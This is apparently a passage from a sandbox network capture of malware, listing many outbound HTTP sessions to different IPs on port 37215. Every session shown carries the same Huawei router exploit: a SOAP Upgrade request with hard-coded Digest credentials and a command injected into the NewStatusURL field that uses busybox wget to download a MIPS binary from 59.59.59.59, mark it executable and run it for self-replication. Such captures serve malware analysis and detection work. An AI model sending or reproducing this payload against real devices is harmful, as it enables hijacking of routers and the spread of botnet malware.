6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1844192.168.2.153773893.133.186.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990526915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1845192.168.2.153791684.80.232.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990551949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1846192.168.2.155938241.126.222.6537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990573883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1847192.168.2.1542974157.190.32.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990591049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1848192.168.2.1541152197.131.85.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990658998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1849192.168.2.155704237.245.145.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990673065 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1850192.168.2.1540910194.86.186.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990770102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1851192.168.2.155433441.145.35.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.993385077 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1852192.168.2.1557240197.140.154.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.993463039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1853192.168.2.155363241.218.14.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.993616104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1854192.168.2.1548754157.138.6.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.996280909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
